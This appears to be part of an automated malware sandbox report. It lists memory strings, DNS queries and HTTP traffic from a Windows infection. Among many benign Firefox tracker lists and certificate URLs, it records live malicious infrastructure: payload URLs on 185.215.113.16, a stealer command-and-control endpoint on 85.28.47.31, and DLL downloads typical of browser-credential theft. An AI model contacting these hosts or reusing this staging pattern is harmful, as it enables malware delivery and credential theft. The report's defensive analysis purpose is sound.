onmozorientationchangetoolbar_field_highlight_textbrowser.theme.toolbar-themelwt-default-theme-in-dark-mode--lwt-background-alignment--lwt-toolbar-field-highlight--lwt-accent-color-inactive_alreadyRecordedTopsitesPainted_unsubscribeFromActivityStream--toolbar-field-background-color_determineIfColorPairIsDark_determineToolbarAndContentThemebrowser.theme.content-themetoolbar_vertical_separator--chrome-content-separator-color--toolbarbutton-icon-fill_subscribeToActivityStreamaboutHomeTopsitesFirstPaint--arrowpanel-border-colorlwt-toolbar-field-brighttextmaybeRecordTopsitesPainted--sidebar-background-colortoolbar_field_border_focusdocument-element-inserteddocument-element-insertedgetSubpropertiesForCSSPropertydocument-element-insertedLOAD_FLAGS_FORCE_ALLOW_COOKIESgetOverflowingChildrenOfElementLOAD_FLAGS_ERROR_LOAD_CHANGES_RVget mergeAttributeRecordshttps://www.youtube.com/accountwebCOOP+COEP=https://youtube.comdocument-element-insertedwebIsolated=https://youtube.comdocument-element-insertedbound _updateEnabledStatePartitioningExceptionListServicedocument-element-insertedLOAD_FLAGS_USER_ACTIVATIONset mergeAttributeRecordsbound fixupAndLoadURIStringhttps://www.youtube.com/accountwebIsolated=https://youtube.comwebIsolated=https://youtube.comfeatureUpdate:majorRelease2022getAllStyleSheetCSSStyleRulesdocument-element-insertedbrowser.newtabpage.enableddocument-element-insertedwebIsolated=https://youtube.comevictOutOfRangeContentViewersfeatureUpdate:firefoxViewNextgetRegisteredCssHighlightsunregisterExceptionListObserverservices.sync.lastTabFetchcustomizableui-special-spring2bound handleWidgetCommand#urlbar-search-mode-indicator_searchModeIndicatorClosedraggableregionleftmousedownexperimental.hideHeuristicFirefoxViewNotificationManager<isPersistedSearchTermsEnabledshouldHandOffToSearchModensIURLQueryStringStripperQUERY_STRIPPING_STRIP_ON_SHAREgetOriginalUrl
Source: firefox.exe, 00000021.00000003.2708137723.000001E53926D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.youtube.com/account --attempting-deelevation'9 equals www.youtube.com (Youtube)
Source: ead6a72944.exe, 0000001C.00000003.2704593283.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, ead6a72944.exe, 0000001C.00000003.2704365877.0000000002117000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2766541210.000001E53ADC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ta\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2919430058.0000026193B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comc equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2916024047.00000261935B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194711000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2916024047.0000026193568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: vaniloin.fun
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube-nocookie.com

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: firefox.exe, 00000028.00000002.2900012409.000002619227D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2879465068.0000026181E68000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/enter.exe
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exeM
Source: explorti.exe, 00000013.00000003.2924686960.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: ba77748b9b.exe, 00000016.00000002.2776962096.00000000027AE000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.0000000002825000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.0000000002730000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/-
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/1vfQ
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/4
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.0000000002730000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.000000000274D000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php7
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpKP
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpS
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpX4
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpY
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpg
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpj
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpjP
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpo
Source: file.exe, 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpq
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpyv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/7vhQ
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllUY
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dllaY6C
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll&
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllk
Source: file.exe, 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll;
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/SSC:
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/U
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/Uv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/dows
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/gv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/sv
Source: file.exe, 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31L
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
